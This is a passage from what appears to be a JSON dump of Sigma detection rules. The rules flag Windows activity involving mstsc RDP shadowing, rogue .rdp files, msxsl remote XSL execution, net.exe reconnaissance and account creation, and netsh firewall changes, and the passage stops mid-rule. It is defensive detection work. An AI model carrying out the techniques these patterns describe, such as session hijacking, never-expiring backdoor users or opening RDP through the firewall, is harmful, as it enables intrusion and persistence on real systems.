    "content": "title: Potential MSTSC Shadowing Activity\nid: 6ba5a05f-b095-4f0a-8654-b825f4f16334\nstatus: test\ndescription: Detects RDP session hijacking by using MSTSC shadowing\nreferences:\n    - https://twitter.com/kmkz_security/status/1220694202301976576\n    - https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-01-24\nmodified: 2023-02-05\ntags:\n    - attack.lateral-movement\n    - attack.t1563.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'noconsentprompt'\n            - 'shadow:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml",
    "content": "title: New Remote Desktop Connection Initiated Via Mstsc.EXE\nid: 954f0af7-62dd-418f-b3df-a84bc2c7a774\nstatus: test\ndescription: |\n    Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\n    Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nauthor: frack113\ndate: 2022-01-07\nmodified: 2024-06-04\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /v:'\n    filter_optional_wsl:\n        # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\\wslg C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp\n        ParentImage: 'C:\\Windows\\System32\\lxss\\wslhost.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - WSL (Windows Sub System For Linux)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml",
    "content": "title: Mstsc.EXE Execution With Local RDP File\nid: 5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock\ndate: 2023-04-18\nmodified: 2023-04-30\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - '.rdp'\n            - '.rdp\"'\n    filter_optional_wsl:\n        ParentImage: 'C:\\Windows\\System32\\lxss\\wslhost.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with legitimate usage of \".rdp\" files\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml",
    "content": "title: Suspicious Mstsc.EXE Execution With Local RDP File\nid: 6e22722b-dfb1-4508-a911-49ac840b40f8\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_extension:\n        CommandLine|endswith:\n            - '.rdp'\n            - '.rdp\"'\n    selection_paths:\n        # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env\n        CommandLine|contains:\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color'\n            - ':\\Windows\\System32\\Tasks_Migrated '\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            # - '\\Desktop\\' # Could be source of FP depending on the environment\n            - '\\Downloads\\' # Could be source of FP depending on the environment\n    condition: all of selection_*\nfalsepositives:\n    - Likelihood is related to how often the paths are used in the environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml",
    "content": "title: Mstsc.EXE Execution From Uncommon Parent\nid: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Covers potential downloads/clicks from browsers\n            - '\\brave.exe'\n            - '\\CCleanerBrowser.exe'\n            - '\\chrome.exe'\n            - '\\chromium.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\microsoftedge.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n            # Covers potential downloads/clicks from email clients\n            - '\\outlook.exe'\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msxsl_execution.yml",
    "content": "title: Msxsl.EXE Execution\nid: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0\nstatus: test\ndescription: |\n    Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.\n    Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msxsl.exe'\n    condition: selection\nfalsepositives:\n    - Msxsl is not installed by default and is deprecated, so unlikely on most systems.\n# Note: If you leverage this utility please consider adding additional filters, as this is looking for \"any\" type of execution\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml",
    "content": "title: Remote XSL Execution Via Msxsl.EXE\nid: 75d0a94e-6252-448d-a7be-d953dff527bb\nstatus: test\ndescription: Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msxsl.exe'\n        CommandLine|contains: 'http'\n    condition: selection\nfalsepositives:\n    - Msxsl is not installed by default and is deprecated, so unlikely on most systems.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml",
    "content": "title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE\nid: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\nstatus: test\ndescription: |\n    Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\n    Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)\nreferences:\n    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nauthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-03-02\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    # Covers group and localgroup flags\n    selection_group_root:\n        CommandLine|contains:\n            - ' group '\n            - ' localgroup '\n    selection_group_flags:\n        CommandLine|contains:\n            # Add more groups for other languages\n            - 'domain admins'\n            - ' administrator' # Typo without an 'S' so we catch both\n            - ' administrateur' # Typo without an 'S' so we catch both\n            - 'enterprise admins'\n            - 'Exchange Trusted Subsystem'\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n            - ' /do' # short for domain\n    filter_group_add:\n        # This filter is added to avoid the potential case where the point is not recon but addition\n        CommandLine|contains: ' /add'\n    # Covers 'accounts' flag\n    selection_accounts_root:\n        CommandLine|contains: ' accounts '\n    selection_accounts_flags:\n        CommandLine|contains: ' /do' # short for domain\n    condition: selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)\nfalsepositives:\n    - Inventory tool runs\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_share_unmount.yml",
    "content": "title: Unmount Share Via Net.EXE\nid: cb7c4a03-2871-43c0-9bbb-18bbdb079896\nstatus: test\ndescription: Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2020-10-08\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'share'\n            - '/delete'\n    condition: all of selection*\nfalsepositives:\n    - Administrators or Power users may remove their shares via cmd line\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_start_service.yml",
    "content": "title: Start Windows Service Via Net.EXE\nid: 2a072a96-a086-49fa-bcb5-15cc5a619093\nstatus: test\ndescription: Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-21\nmodified: 2023-03-05\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: ' start '     # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator or user executes a service for legitimate reasons.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_stop_service.yml",
    "content": "title: Stop Windows Service Via Net.EXE\nid: 88872991-7445-4a22-90b2-a3adadb0e827\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the \"net\" utility.\nreferences:\n    - https://ss64.com/nt/net-service.html\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n    selection_cli:\n        CommandLine|contains: ' stop '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml",
    "content": "title: Windows Admin Share Mount Via Net.EXE\nid: 3abd6094-7027-475f-9630-8ab9be7b9725\nrelated:\n    - id: f117933c-980c-4f78-b384-e3d838111165\n      type: similar\nstatus: test\ndescription: Detects when an admin share is mounted using net.exe\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga\ndate: 2020-10-05\nmodified: 2023-02-21\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ' \\\\\\\\*\\\\*$'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml",
    "content": "title: Windows Internet Hosted WebDav Share Mount Via Net.EXE\nid: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0\nstatus: test\ndescription: Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-21\nmodified: 2023-07-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ' http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml",
    "content": "title: Windows Share Mount Via Net.EXE\nid: f117933c-980c-4f78-b384-e3d838111165\nrelated:\n    - id: 3abd6094-7027-475f-9630-8ab9be7b9725\n      type: similar\nstatus: test\ndescription: Detects when a share is mounted using the \"net.exe\" utility\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-02\nmodified: 2023-02-21\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' use '\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity by administrators and scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery Via Net.EXE\nid: 1c67a717-32ba-409b-a45d-0fb704a73a81\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        - CommandLine|endswith:\n              - ' use'\n              - ' sessions'\n        - CommandLine|contains:\n              - ' use '\n              - ' sessions '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml",
    "content": "title: Password Provided In Command Line Of Net.EXE\nid: d4498716-1d52-438f-8084-4a603157d131\nstatus: test\ndescription: Detects when net.exe is called with a password in the command line\nreferences:\n    - Internal Research\nauthor: Tim Shelton (HAWK.IO)\ndate: 2021-12-09\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1078\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ':*\\\\'\n            - '/USER:* *'\n    filter_main_empty:\n        CommandLine|endswith: ' '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_add.yml",
    "content": "title: New User Created Via Net.EXE\nid: cd219ff3-fa99-45d4-8380-a7d15116c6dc\nrelated:\n    - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c\n      type: similar\nstatus: test\ndescription: Identifies the creation of local users via the net.exe command.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nauthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community)\ndate: 2018-10-30\nmodified: 2023-02-21\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate user creation.\n    - Better use event IDs for user creation rather than command line rules.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml",
    "content": "title: New User Created Via Net.EXE With Never Expire Option\nid: b9f0e6f5-09b4-4358-bae4-08408705bd5c\nrelated:\n    - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc\n      type: derived\nstatus: test\ndescription: Detects creation of local users via the net.exe command with the option \"never expire\"\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2023-02-21\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n            - 'expires:never'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml",
    "content": "title: Suspicious Manipulation Of Default Accounts Via Net.EXE\nid: 5b768e71-86f2-4879-b448-81061cbae951\nstatus: test\ndescription: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password, etc.\nreferences:\n    - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\n    - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-21\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_user_option:\n        CommandLine|contains: ' user '\n    selection_username:\n        CommandLine|contains:\n            # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag\n            - ' Järjestelmänvalvoja ' # Finnish\n            - ' Rendszergazda ' # Hungarian\n            - ' Администратор ' # Russian\n            - ' Administrateur ' # French\n            - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish\n            - ' Administratör ' # Swedish\n            - ' Administrator ' # English\n            - ' guest '\n            - ' DefaultAccount '\n            # The cases below are for when an attacker requests the net command via 'cmd /c....'\n            # First in double quotes\n            - ' \"Järjestelmänvalvoja\" ' # Finnish\n            - ' \"Rendszergazda\" ' # Hungarian\n            - ' \"Администратор\" ' # Russian\n            - ' \"Administrateur\" ' # French\n            - ' \"Administrador\" ' # Portuguese (Brazil + Portugal) + Spanish\n            - ' \"Administratör\" ' # Swedish\n            - ' \"Administrator\" ' # English\n            - ' \"guest\" '\n            - ' \"DefaultAccount\" '\n            # Second in single quotes\n            - \" 'Järjestelmänvalvoja' \" # Finnish\n            - \" 'Rendszergazda' \" # Hungarian\n            - \" 'Администратор' \" # Russian\n            - \" 'Administrateur' \" # French\n            - \" 'Administrador' \" # Portuguese (Brazil + Portugal) + Spanish\n            - \" 'Administratör' \" # Swedish\n            - \" 'Administrator' \" # English\n            - \" 'guest' \"\n            - \" 'DefaultAccount' \"\n    filter:\n        CommandLine|contains|all:\n            - 'guest'\n            - '/active no'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml",
    "content": "title: Share And Session Enumeration Using Net.EXE\nid: 62510e69-616b-4078-b371-847da438cc03\nstatus: stable\ndescription: Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Endgame, JHasenbusch (ported for oscd.community)\ndate: 2018-10-30\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: 'view'\n    filter:\n        CommandLine|contains: '\\\\\\\\'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Legitimate use of net.exe utility by legitimate user\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml",
    "content": "title: New Firewall Rule Added Via Netsh.EXE\nid: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c\nstatus: test\ndescription: Detects the addition of a new rule to the Windows firewall via netsh\nreferences:\n    - https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nauthor: Markus Neis, Sander Wiebing\ndate: 2019-01-29\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - attack.s0246\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' firewall '\n            - ' add '\n    filter_optional_dropbox:\n        CommandLine|contains:\n            - 'advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=?:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any'\n            - 'advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=?:\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml",
    "content": "title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE\nid: a35f5a72-f347-4e36-8895-9869b0d5fc6d\nstatus: test\ndescription: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall\nreferences:\n    - https://www.virusradar.com/en/Win32_Kasidet.AD/description\n    - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100\nauthor: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2020-05-25\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'firewall'\n              - 'add'\n              - 'allowedprogram'\n        - CommandLine|contains|all:\n              - 'advfirewall'\n              - 'firewall'\n              - 'add'\n              - 'rule'\n              - 'action=allow'\n              - 'program='\n    selection_paths:\n        CommandLine|contains:\n            - ':\\$Recycle.bin\\'\n            - ':\\RECYCLER.BIN\\'\n            - ':\\RECYCLERS.BIN\\'\n            - ':\\SystemVolumeInformation\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Desktop\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\addins\\'\n            - ':\\Windows\\cursors\\'\n            - ':\\Windows\\debug\\'\n            - ':\\Windows\\drivers\\'\n            - ':\\Windows\\fonts\\'\n            - ':\\Windows\\help\\'\n            - ':\\Windows\\system32\\tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\Downloads\\'\n            - '\\Local Settings\\Temporary Internet Files\\'\n            - '\\Temporary Internet Files\\Content.Outlook\\'\n            - '%Public%\\'\n            - '%TEMP%'\n            - '%TMP%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml",
    "content": "title: RDP Connection Allowed Via Netsh.EXE\nid: 01aeb693-138d-49d2-9403-c4f52d7d3d62\nstatus: test\ndescription: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware\nreferences:\n    - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/\nauthor: Sander Wiebing\ndate: 2020-05-23\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        # Example:\n        #   Old: netsh firewall add portopening TCP 3389 \"Open Port 3389\"\n        #   New: netsh advfirewall firewall add rule name= \"Open Port 3389\" dir=in action=allow protocol=TCP localport=3389\n        CommandLine|contains|all:\n            - 'firewall '\n            - 'add '\n            - 'tcp '\n            - '3389'\n        CommandLine|contains:\n            - 'portopening'\n            - 'allow'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate 